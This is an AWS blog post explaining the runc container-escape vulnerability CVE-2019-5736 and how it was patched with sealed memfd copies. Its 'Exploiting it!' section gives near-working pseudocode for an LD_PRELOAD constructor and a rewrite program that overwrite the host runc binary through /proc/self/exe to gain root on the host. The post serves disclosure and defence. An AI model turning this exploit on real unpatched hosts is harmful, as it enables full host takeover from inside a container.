Note: This post was originally published on the AWS Compute Blog.

On Monday, February 11, CVE-2019-5736 was disclosed. This vulnerability is a flaw in runc, which can be exploited to escape Linux containers launched with Docker, containerd, CRI-O, or any other user of runc. But how does it work? Dive in!

This concern has already been addressed for AWS, and no customer action is required. For more information, see the security bulletin.

A review of Linux process management

Before I explain the vulnerability, here’s a review of some Linux basics.

Processes and syscalls

Processes form the core unit of running programs on Linux. Every launched program is represented by one or more processes. Processes contain a variety of data about the running program, including a process ID (pid), a table tracking in-use memory, a pointer to the currently executing instruction, a set of descriptors for open files, and so forth.

Processes interact with the operating system to perform operations such as reading and writing files, taking input, and communicating on the network. They do so via system calls, or syscalls. The ones I’m interested in today involve creating other processes (typically through fork(2) or clone(2)) and changing the currently running program into something else (execve(2)).

File descriptors are how a process interacts with files, as managed by the Linux kernel. File descriptors are short identifiers (numbers) that are passed to the appropriate syscalls for interacting with files: read(2), write(2), close(2), and so forth.

Sometimes a process wants to spawn another process. That might be a shell running a program you typed at the terminal, a daemon that needs a helper, or even concurrent processing without threads. When this happens, the process typically uses the fork(2) or clone(2) syscalls.

These syscalls have some differences, but they both operate by creating another copy of the currently executing process and sharing some state. That state can include things like the memory structures (either shared memory segments or copies of the memory) and file descriptors.

After the new process is started, it’s the responsibility of both processes to figure out which one they are (am I the parent? Am I the child?). Then, they take the appropriate action. In many cases, the appropriate action is for the child to do some setup, and then execute the execve(2) syscall.

The following example shows the use of fork(2), in pseudocode:

func main() {
    child_pid = fork();
    if (child_pid > 0) {
        // This is the parent process, since child_pid is the pid of the child
        // process.
    } else if (child_pid == 0) {
        // This is the child process. It can retrieve its own pid via getpid(2),
        // if desired.  This child process still sees all the variables in memory
        // and all the open file descriptors.
    } else {
        // fork(2) returned a negative value: no child process was created.
    }
}
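For a runnable counterpart to the pseudocode, here is a minimal Python sketch (os.fork calls the same fork function). The helper name fork_and_report and the pipe are my own additions for illustration: the pipe is opened before the fork, so both processes hold its descriptors, and the child uses it to report its pid back to the parent. Unlike the C call, os.fork raises OSError on failure instead of returning a negative value.

```python
import os


def fork_and_report():
    """Fork once; the child writes its pid into a pipe that the parent reads."""
    read_end, write_end = os.pipe()
    child_pid = os.fork()
    if child_pid == 0:
        # Child: the pipe descriptors were copied from the parent by fork.
        os.close(read_end)
        os.write(write_end, str(os.getpid()).encode())
        os._exit(0)  # leave immediately without running the parent's cleanup
    # Parent: child_pid is the pid of the new process.
    os.close(write_end)
    reported = int(os.read(read_end, 32).decode())
    os.close(read_end)
    os.waitpid(child_pid, 0)
    return child_pid, reported


if __name__ == "__main__":
    child_pid, reported = fork_and_report()
    print(f"fork returned {child_pid}; child reported {reported}")
```

The two numbers match: the value fork hands to the parent is the same pid that the child sees from getpid.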

The execve(2) syscall instructs the Linux kernel to replace the currently executing program with another program, in-place. When called, the Linux kernel loads the new executable as specified and passes the specified arguments. Because this is done in place, the pid is preserved and a variety of other contextual information is carried over, including environment variables, the current working directory, and any open files.

func main() {
    // execl(3) is a wrapper around the execve(2) syscall that accepts the
    // arguments for the executed program as a list.
    // The first argument to execl(3) is the path of the executable to
    // execute, which in this case is the pwd(1) utility for printing out
    // the working directory.
    // The next argument to execl(3) is the first argument passed through
    // to the new program (in a C program, this would be the first element
    // of the argv array, or argv[0]).  By convention, this is the same as
    // the path of the executable.
    // The remaining arguments to execl(3) are the other arguments visible
    // in the new program's argv array, terminated by NULL.  As you're
    // not passing any additional arguments, just pass NULL here.
    execl("/bin/pwd", "/bin/pwd", NULL);
    // Nothing after this point executes, since the running process has been
    // replaced by the new pwd(1) program.
}
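The same idea as a runnable Python sketch, combining fork and exec so that the calling program survives to read the result. The helper name run_pwd_in_child is hypothetical, and I am assuming /bin/pwd exists on your system. The child changes its working directory, points its stdout at a pipe, and then replaces itself with pwd(1); both settings carry over into the new program.

```python
import os


def run_pwd_in_child(directory):
    """Fork, then replace the child with /bin/pwd; return what it printed."""
    read_end, write_end = os.pipe()
    child_pid = os.fork()
    if child_pid == 0:
        try:
            os.chdir(directory)    # the working directory survives execv
            os.dup2(write_end, 1)  # make the pipe the child's stdout
            os.execv("/bin/pwd", ["/bin/pwd"])
        finally:
            os._exit(127)          # reached only if something above failed
    os.close(write_end)
    chunks = []
    while True:
        chunk = os.read(read_end, 4096)
        if not chunk:              # EOF: the child has exited
            break
        chunks.append(chunk)
    os.close(read_end)
    os.waitpid(child_pid, 0)
    return b"".join(chunks).decode().strip()


if __name__ == "__main__":
    print(run_pwd_in_child("/"))
```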

Wait…open files? By default, open files are passed across the execve(2) boundary. This is useful in cases where the new program can’t open the file, for example if there’s a new mount covering the existing path. This is also the mechanism by which the standard I/O streams (stdin, stdout, and stderr) are made available to the new program.

While convenient in some use cases, preserving open file descriptors in the new program is not always desirable. This behavior can be changed by passing the O_CLOEXEC flag to open(2) when opening the file or by setting the FD_CLOEXEC flag with fcntl(2). Using O_CLOEXEC or FD_CLOEXEC (which are both short for close-on-exec) prevents the new program from having access to the file descriptor.

func main() {
    // open(2) opens a file.  The first argument to open is the path of the file
    // and the second argument is a bitmask of flags that describe options
    // applied to the file that's opened.  open(2) then returns a file
    // descriptor, which can be used in subsequent syscalls to represent this
    // file.
    // For this example, open /dev/urandom, which is a file containing random
    // bytes.  Pass two flags: O_RDONLY and O_CLOEXEC; O_RDONLY indicates that
    // the file should be open for reading but not writing, and O_CLOEXEC
    // indicates that the file descriptor should not pass through the execve(2)
    // boundary.
    fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
    // All valid file descriptors are non-negative integers, so a returned
    // value < 0 indicates that an error occurred.
    if (fd < 0) {
        // perror(3) is a function to print out the last error that occurred.
        perror("could not open /dev/urandom");
        // exit(3) causes a process to exit with a given exit code. Return 1
        // here to indicate that an error occurred.
        exit(1);
    }
}
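If you want to inspect or flip the flag on a descriptor that is already open, fcntl(2) is the tool. The following Python sketch uses two helper names of my own (is_close_on_exec and set_close_on_exec). One caveat: Python's os.open already marks new descriptors as non-inheritable, so passing O_CLOEXEC explicitly is redundant there; I include it only to mirror the pseudocode.

```python
import fcntl
import os


def is_close_on_exec(fd):
    """Return True if FD_CLOEXEC is set on the descriptor."""
    return bool(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC)


def set_close_on_exec(fd, enabled):
    """Set or clear FD_CLOEXEC, leaving other descriptor flags untouched."""
    flags = fcntl.fcntl(fd, fcntl.F_GETFD)
    if enabled:
        flags |= fcntl.FD_CLOEXEC
    else:
        flags &= ~fcntl.FD_CLOEXEC
    fcntl.fcntl(fd, fcntl.F_SETFD, flags)


if __name__ == "__main__":
    fd = os.open("/dev/urandom", os.O_RDONLY | os.O_CLOEXEC)
    print("close-on-exec after open:", is_close_on_exec(fd))
    set_close_on_exec(fd, False)  # the descriptor would now survive execve
    print("close-on-exec after clearing:", is_close_on_exec(fd))
    os.close(fd)
```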

What is /proc?

/proc (or proc(5)) is a pseudo-filesystem that provides access to a number of Linux kernel data structures. Every process in Linux has a directory available for it called /proc/[pid]. This directory stores a bunch of information about the process, including the arguments it was given when the program started, the environment variables visible to it, and the open file descriptors.

The special files inside /proc/[pid]/fd describe the file descriptors that the process has open. They look like symbolic links (symlinks), and you can see the original path of the file, but they aren’t exactly symlinks. You can pass them to open(2) even if the original path is inaccessible and get another working file descriptor.

Another file inside /proc/[pid] is called exe. This file is like the ones in /proc/[pid]/fd except that it points to the binary program that is executing inside that process.

/proc/[pid] also has a companion directory, /proc/self. This directory is always the same as /proc/[pid] of the process that is accessing it. That is, you can always read your own /proc data from /proc/self without knowing your pid.
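To see these special files in action, here is a small Python sketch with hypothetical helper names. It opens a temporary file, deletes its path, and then reopens the same file through /proc/self/fd. It also reads the exe link for the current process, which in this case is the Python interpreter.

```python
import os
import tempfile


def reopen_deleted_file():
    """Open a file, delete its path, then reopen it through /proc/self/fd."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"still here")
        os.unlink(path)                         # the original path is gone
        link = f"/proc/self/fd/{fd}"
        target = os.readlink(link)              # Linux usually appends " (deleted)"
        second_fd = os.open(link, os.O_RDONLY)  # yet opening the link still works
        try:
            data = os.read(second_fd, 64)
        finally:
            os.close(second_fd)
        return target, data
    finally:
        os.close(fd)


def current_executable():
    """Return the path that /proc/self/exe points to for this process."""
    return os.readlink("/proc/self/exe")


if __name__ == "__main__":
    print(reopen_deleted_file())
    print(current_executable())
```

The second descriptor is a fresh open of the same file, so it starts reading from the beginning even though the first descriptor's position sits at the end of what was written.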

Dynamic linking

When writing programs, software developers typically use libraries—collections of previously written code intended to be reused. Libraries can cover all sorts of things, from high-level concerns like machine learning to lower-level concerns like basic data structures or interfaces with the operating system.

In the fork(2) example earlier, you can see the use of a library through a call to a function that the library defines (fork).

Libraries are made available to programs through linking: a mechanism for resolving symbols (types, functions, variables, etc.) to their definition. On Linux, programs can be statically linked, in which case all the linking is done at compile time and all symbols are fully resolved. Or they can be dynamically linked, in which case at least some symbols are unresolved until a runtime linker makes them available.

Dynamic linking makes it possible to replace some parts of the resulting code without recompiling the whole application. This is typically used for upgrading libraries to fix bugs, enhance performance, or to address security concerns. In contrast, static linking requires re-compiling and re-linking each program that uses a given library to effect the same change.

On Linux, runtime linking is typically performed by ld-linux.so(8), which is provided by the GNU project toolchain. Dynamically linked libraries are specified by a name embedded into the compiled binary. This dynamic linker reads those names and then performs a search across a standard set of paths to find the associated library file (a shared object file, or .so).

The dynamic linker’s search path can be influenced by the LD_LIBRARY_PATH environment variable. The LD_PRELOAD environment variable can tell the linker to load additional, user-specified libraries before all others. This is useful in debugging scenarios to allow selective overriding of symbols without having to rebuild a library entirely.
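One way to observe the result of dynamic linking is to look at which shared object files ended up mapped into a running process. The sketch below is Python, with a helper name (shared_objects) that I made up. It parses the text of /proc/[pid]/maps and returns the distinct .so paths it finds. Anything loaded through LD_PRELOAD would show up in this list as well.

```python
import os


def shared_objects(maps_text):
    """Return the distinct .so paths named in /proc/[pid]/maps content."""
    paths = set()
    for line in maps_text.splitlines():
        # Columns: address, permissions, offset, device, inode, optional path.
        fields = line.split(None, 5)
        if len(fields) == 6:
            path = fields[5].strip()
            if ".so" in os.path.basename(path):
                paths.add(path)
    return sorted(paths)


if __name__ == "__main__":
    with open("/proc/self/maps") as maps:
        for path in shared_objects(maps.read()):
            print(path)
```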

The vulnerability

Now that the cast of characters is set (fork(2), execve(2), open(2), proc(5), file descriptors, and linking), I can start talking about the vulnerability in runc.

runc is a container runtime. Like a shell, its primary purpose is to launch other programs. However, it does so after manipulating Linux resources like cgroups, namespaces, mounts, seccomp, and capabilities to make what is referred to as a “container.”

The primary mechanism for setting up some of these resources, like namespaces, is through flags to the clone(2) syscall that take effect in the new process. The target of the final execve(2) call is the program the user requested. With a container, the target of the final execve(2) call can be specified in the container image or through explicit arguments.
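You can check which namespaces a process ended up in by reading the links under /proc/[pid]/ns. Each link target names the namespace type and an inode number, and two processes share a namespace when the numbers match. The following Python sketch uses helper names of my own and assumes the link format shown in its docstring.

```python
import os
import re

_NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(target):
    """Split a link target such as 'mnt:[4026531840]' into (type, inode)."""
    match = _NS_LINK.match(target)
    if match is None:
        raise ValueError(f"unexpected namespace link: {target!r}")
    return match.group(1), int(match.group(2))


def current_namespaces(pid="self"):
    """Map each entry under /proc/[pid]/ns to its namespace inode number."""
    ns_dir = f"/proc/{pid}/ns"
    result = {}
    for name in os.listdir(ns_dir):
        _kind, inode = parse_ns_link(os.readlink(os.path.join(ns_dir, name)))
        result[name] = inode
    return result


if __name__ == "__main__":
    for name, inode in sorted(current_namespaces().items()):
        print(f"{name}: {inode}")
```

Running this once on the host and once inside a container should print different numbers for the namespaces that the runtime created for the container.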

The CVE announcement states:

“The vulnerability allows a malicious container to […] overwrite the host runc binary […]. The level of user interaction is being able to run any command […] as root within a container [when creating] a new container using an attacker-controlled image.”

The operative parts of this are: being able to overwrite the host runc binary (that seems bad) by running a command (that’s…what runc is supposed to do…). Note too that the vulnerability is as simple as running a command and does not require running a container with elevated privileges or running in a non-default configuration.

Don’t containers protect against this?

Containers are, in many ways, intended to isolate the host from a given workload or to isolate a given workload from the host. One of the main mechanisms for doing this is through a separate view of the filesystem. With a separate view, the container shouldn’t be able to access the host’s files and should only be able to see its own. runc accomplishes this using a mount namespace and mounting the container image’s root filesystem as /. This effectively hides the host’s filesystem.

Even with techniques like this, things can pass through the mount namespace. For example, the /proc/cmdline file contains the running Linux kernel’s command-line parameters. One of those parameters typically indicates the host’s root filesystem, and a container with enough access (like CAP_SYS_ADMIN) can remount the host’s root filesystem within the container’s mount namespace.

That’s not what I’m talking about today, as that requires non-default privileges to run. The interesting thing today is that the /proc filesystem exposes a path to the original program’s file, even if that file is not located in the current mount namespace.

What makes this troublesome is that interacting with Linux primitives like namespaces typically requires you to run as root, somewhere. In most installations involving runc (including the default configuration in Docker, Kubernetes, containerd, and CRI-O), the whole setup runs as root.

runc must be able to perform a number of operations that require elevated privileges, even if your container is limited to a much smaller set of privileges. For example, namespace creation and mounting both require the elevated capability CAP_SYS_ADMIN, and configuring the network requires the elevated capability CAP_NET_ADMIN. You might see a pattern here.
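To check whether a process holds these capabilities, you can read the CapEff line in /proc/[pid]/status, which is a hexadecimal bitmask. Here is a minimal Python sketch. The function names are hypothetical; the bit numbers come from the kernel's linux/capability.h header.

```python
CAP_NET_ADMIN = 12  # bit numbers from <linux/capability.h>
CAP_SYS_ADMIN = 21


def effective_caps(status_text):
    """Extract the CapEff bitmask from /proc/[pid]/status content."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_cap(mask, cap):
    """Return True if the capability's bit is set in the mask."""
    return bool(mask & (1 << cap))


if __name__ == "__main__":
    with open("/proc/self/status") as status:
        mask = effective_caps(status.read())
    print("CAP_SYS_ADMIN:", has_cap(mask, CAP_SYS_ADMIN))
    print("CAP_NET_ADMIN:", has_cap(mask, CAP_NET_ADMIN))
```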

An alternative to running as root is to leverage a user namespace. User namespaces map a set of UIDs and GIDs inside the namespace (including ones that appear to be root) to a different set of UIDs and GIDs outside the namespace. Kernel operations that are user-namespace-aware can delineate privileged actions occurring inside the user namespace from those that occur outside.

However, user namespaces are not yet widely employed and are not enabled by default. The set of kernel operations that are user-namespace-aware is still growing, and not everyone runs the newest kernel or user-space software.
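The mapping itself is visible in /proc/[pid]/uid_map (and gid_map for groups). Each line holds three numbers: the first ID inside the namespace, the first ID outside, and the length of the range. The Python sketch below is a simplified illustration with a function name of my own; it translates an inside ID to its outside counterpart.

```python
def map_to_outside(id_map_text, inside_id):
    """Translate an ID inside a user namespace using uid_map/gid_map content.

    Returns None when the ID falls outside every mapped range.
    """
    for line in id_map_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        inside_start, outside_start, length = map(int, fields)
        if inside_start <= inside_id < inside_start + length:
            return outside_start + (inside_id - inside_start)
    return None


if __name__ == "__main__":
    with open("/proc/self/uid_map") as uid_map:
        print("uid 0 maps to:", map_to_outside(uid_map.read(), 0))
```

With a mapping line of "0 100000 65536", root inside the namespace is UID 100000 outside it, which is why ordinary file permissions on a root-owned runc binary would stop the write.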

So, /proc exposes a path to the original program’s file, and the process that starts the container runs as root. What if that original program is something important that you knew would run again… like runc?

Exploiting it!

runc’s job is to run commands that you specify. What if you specified /proc/self/exe? It would cause runc to spawn a copy of itself, but running inside the context of the container, with the container’s namespaces, root filesystem, and so on. For example, you could run the following command:

docker run --rm amazonlinux:2 /proc/self/exe

This, by itself, doesn’t get you far—runc doesn’t hurt itself.

Generally, runc is dynamically linked against some libraries that provide implementations for seccomp(2), SELinux, or AppArmor. If you remember from earlier, ld-linux.so(8) searches a standard set of file paths to provide these implementations at runtime. If you start runc again inside the container’s context, with its separate filesystem, you have the opportunity to provide other files in place of the expected library files. These can run your own code instead of the standard library code.

There’s an easier way, though. Instead of having to make something that looks like (for example) libseccomp, you can take advantage of a different feature of the dynamic linker: LD_PRELOAD. And because runc lets you specify environment variables along with the path of the executable to run, you can specify this environment variable, too.

With LD_PRELOAD, you can specify your own libraries to load first, ahead of the other libraries that get loaded. Because the original libraries still get loaded, you don’t actually have to have a full implementation of their interface. Instead, you can selectively override some common functions that you might want and omit others that you don’t.

So now you can inject code through LD_PRELOAD and you have a target to inject it into: runc, by way of /proc/self/exe. For your code to get run, something must call it. You could search for a target function to override, but that means inspecting runc’s code to figure out what could get called and how. Again, there’s an easier way. Dynamic libraries can specify a “constructor” that is run immediately when the library is loaded.

Using the “constructor” along with LD_PRELOAD and specifying the command as /proc/self/exe, you now have a way to inject code and get it to run. That’s it, right? You can now write to /proc/self/exe and overwrite runc!

Not so fast.

The Linux kernel does have a bit of a protection mechanism to prevent you from overwriting the currently running executable. If you open /proc/self/exe for writing, you get -ETXTBSY. This error code indicates that the file is busy, where “TXT” refers to the text (code) section of the binary.
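You can observe this protection safely with a throwaway binary. The Python sketch below (the function name is hypothetical) copies sleep(1) into a temporary directory, starts the copy, and tries to open it for writing while it runs. I am assuming that sleep is on your PATH and that the temporary directory allows execution. Some kernels or sandboxes may not enforce the check, in which case the open simply succeeds.

```python
import errno
import os
import shutil
import subprocess
import tempfile


def open_running_binary_for_write():
    """Return the errno from opening a running executable for writing.

    Returns 0 if the open unexpectedly succeeds.
    """
    with tempfile.TemporaryDirectory() as workdir:
        # Copy sleep(1) so the experiment never touches a system binary.
        binary = os.path.join(workdir, "sleep")
        shutil.copy(shutil.which("sleep"), binary)
        proc = subprocess.Popen([binary, "30"])
        try:
            fd = os.open(binary, os.O_WRONLY)  # no O_TRUNC: nothing is modified
        except OSError as exc:
            return exc.errno
        else:
            os.close(fd)
            return 0
        finally:
            proc.kill()
            proc.wait()


if __name__ == "__main__":
    result = open_running_binary_for_write()
    print(errno.errorcode.get(result, "open succeeded"))
```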

You know from earlier that execve(2) is a mechanism to replace the currently running executable with another, which means that the original executable isn’t in use anymore. So instead of just having a single library that you load with LD_PRELOAD, you also must have another executable that can do the dirty work for you, which you can execve(2).

Normally, doing this would still be unsuccessful due to file permissions. Executables are typically not world-writable. But because runc runs as root and does not change users, the new runc process that you started through /proc/self/exe and the helper program that you executed are also run as root.

After you gain write access to the runc file descriptor and you’ve replaced the currently executing program with execve(2), you can replace runc’s content with your own. The other software on the system continues to start runc as part of its normal operation (for example, creating new containers, stopping containers, or performing exec operations inside containers). Your code has the chance to operate instead of runc. When it gets run this way, your code runs as root, in the host’s context instead of in the container’s context.

Now you’re done! You’ve successfully escaped the container and have full root access.

Putting that all together, you get something like the following pseudocode:

Pseudocode for preload.so

func constructor(){
    // /proc/self/exe is a virtual file pointing to the currently running
    // executable.  Open it here so that it can be passed to the next
    // process invoked.  It must be opened read-only, or the kernel will fail
    // the open syscall with ETXTBSY.  You cannot gain write access to the text
    // portion of a running executable.
    fd = open("/proc/self/exe", O_RDONLY);
    if (fd < 0) {
        error("could not open /proc/self/exe");
        exit(1);
    }
    // /proc/self/fd/%d is a virtual file representing the open file descriptor
    // to /proc/self/exe, which you opened earlier.
    filename = sprintf("/proc/self/fd/%d", fd);
    // execl is a call that executes a new executable, replacing the
    // currently running process and preserving aspects like the process ID.
    // Execute the "rewrite" binary, passing it arguments representing the
    // path of the open file descriptor. Because you did not pass O_CLOEXEC when
    // opening the file, the file descriptor remains open in the replacement
    // program and retains the same descriptor.
    execl("/rewrite", "/rewrite", filename, NULL);
    // execl never returns, except on an error
    error("couldn't execl");
}

Pseudocode for the rewrite program

// rewrite is your cooperating malicious program that takes an argument
// representing a file descriptor path, reopens it as read-write, and
// replaces the contents.  rewrite expects that it is unable to open
// the file on the first try, as the kernel has not closed it yet
func main(argc, *argv[]) {
    fd = 0;
    printf("Running\n");
    for(tries = 0; tries < 10000; tries++) {
        // argv[1] is the argument that contains the path to the virtual file
        // of the read-only file descriptor
        fd = open(argv[1], O_RDWR|O_TRUNC);
        if( fd >= 0 ) {
            printf("open succeeded\n");
            break;
        } else {
            if(errno != ETXTBSY) {
                // You expect a lot of ETXTBSY, so only print when you get
                // something else
                error("open");
            }
        }
    }
    if (fd < 0) {
        error("exhausted all open attempts");
        exit(1);
    }
    dprintf(fd, "CVE-2019-5736\n");
    printf("wrote over runc!\n");
    fflush(stdout);
}

The above code was written by Noah Meyerhans, iliana weller, and Samuel Karp.

How does the patch work?

If you try the same approach with a patched runc, you instead see that opening the file with O_RDWR is denied. This means that the patch is working!

The runc patch operates by taking advantage of some Linux kernel features introduced in kernel 3.17, specifically a syscall called memfd_create(2). This syscall creates a temporary memory-backed file and returns a file descriptor that can be used to access the file. The file has some special semantics: it is automatically removed when the last reference to it is dropped, and because it lives in memory, removal just equates to freeing the memory. It also supports another useful feature: file sealing. File sealing allows the file to be made immutable, even to processes that are running as root.

The runc patch changes the behavior of runc so that it creates a copy of itself in one of these temporary file descriptors, and then seals it. The next time a process launches (via fork(2)) or a process is replaced (via execve(2)), /proc/self/exe will be this sealed, memory-backed file descriptor. When your rewrite program attempts to modify it, the Linux kernel prevents it as it’s a sealed file.

Could I have avoided being vulnerable?

Yes, a few different mechanisms were available before the patch that provided mitigation for this vulnerability. The one that I mentioned earlier is user namespaces. Mapping to a different user namespace inside the container would mean that normal Linux file permissions would effectively prevent runc from becoming writable because the compromised process inside the container is not running as the real root user.

Another mechanism, which is used by Google Container-Optimized OS, is to have the host’s root filesystem mounted as read-only. A read-only mount of the runc binary itself would also prevent the runc binary from becoming writable.

SELinux, when correctly configured, may also prevent this vulnerability.

A different approach to preventing this vulnerability is to treat the Linux kernel as belonging to a single tenant, and spend your effort securing the kernel through another layer of separation. This is typically accomplished using a hypervisor or a virtual machine.

Amazon invests heavily in this type of boundary. Amazon EC2 instances, AWS Lambda functions, and AWS Fargate tasks are secured from each other using techniques like these. Amazon EC2 bare-metal instances leverage the next-generation Nitro platform that allows AWS to offer secure, bare-metal compute with a hardware root-of-trust. Along with traditional hypervisors, the Firecracker virtual machine manager can be used to implement this technique with function- and container-like workloads.

Further reading

The original researchers who discovered this vulnerability have published their own post, CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host. They describe how they discovered the vulnerability, as well as several other attempts.

I’d like to thank the original researchers who discovered the vulnerability for reporting responsibly and the OCI maintainers (and Aleksa Sarai specifically) who coordinated the disclosure. Thanks to Linux distribution maintainers and cloud providers who made updated packages available quickly. I’d also like to thank the Amazonians who made it possible for AWS customers to be protected: